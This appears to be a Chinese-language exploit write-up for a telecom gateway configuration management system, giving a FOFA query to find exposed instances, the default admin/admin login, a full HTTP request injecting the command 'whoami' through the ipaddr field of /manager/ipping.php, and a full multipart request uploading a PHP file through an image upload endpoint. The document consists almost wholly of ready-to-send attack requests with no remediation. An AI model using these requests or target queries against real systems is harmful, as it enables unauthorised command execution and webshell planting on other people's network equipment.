电信网关配置管理系统漏洞

电信网关配置管理系统漏洞

• fofa语句:
  body="img/dl.gif" && title="系统登录"

1.弱口令漏洞

• 弱口令:
  admin|admin

2.RCE漏洞

• RCE

  POST /manager/ipping.php HTTP/1.1
  Host:  
  Upgrade-Insecure-Requests: 1
  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
  Accept-Encoding: gzip, deflate
  Accept-Language: zh-CN,zh;q=0.9,zh-TW;q=0.8,zh-HK;q=0.7,en;q=0.6
  Cookie: PHPSESSID={弱口令登录获取PHPSESSID} 
  Connection: close
  Content-Type: application/x-www-form-urlencoded
  Content-Length: 25
  
  ipaddr=127.0.0.1 | whoami
  

3.文件上传漏洞

• 文件上传

  POST /manager/teletext/material/upload.php HTTP/1.1
  Host:  
  Cache-Control: max-age=0
  Upgrade-Insecure-Requests: 1
  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
  Accept-Encoding: gzip, deflate
  Accept-Language: zh-CN,zh;q=0.9,zh-TW;q=0.8,zh-HK;q=0.7,en;q=0.6
  Cookie: PHPSESSID=vsdl33qjn3fbslu7k3r99di5n3
  Connection: close
  Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryB33cDIYAxIrc9MsS
  Content-Length: 786
  
  ------WebKitFormBoundaryB33cDIYAxIrc9MsS
  Content-Disposition: form-data; name="fileToUpload"; filename="1.php"
  Content-Type: image/png
  
  <?php phpinfo();?>
  ------WebKitFormBoundaryB33cDIYAxIrc9MsS
  Content-Disposition: form-data; name="type"
  
  img
  ------WebKitFormBoundaryB33cDIYAxIrc9MsS
  Content-Disposition: form-data; name="w"
  
  1280
  ------WebKitFormBoundaryB33cDIYAxIrc9MsS
  Content-Disposition: form-data; name="h"
  
  720
  ------WebKitFormBoundaryB33cDIYAxIrc9MsS
  Content-Disposition: form-data; name="userid"
  
  1000398
  ------WebKitFormBoundaryB33cDIYAxIrc9MsS
  Content-Disposition: form-data; name="appid"
  
  5
  ------WebKitFormBoundaryB33cDIYAxIrc9MsS
  Content-Disposition: form-data; name="uploadtime"
  
  20230603_231117_1685805077294
  ------WebKitFormBoundaryB33cDIYAxIrc9MsS--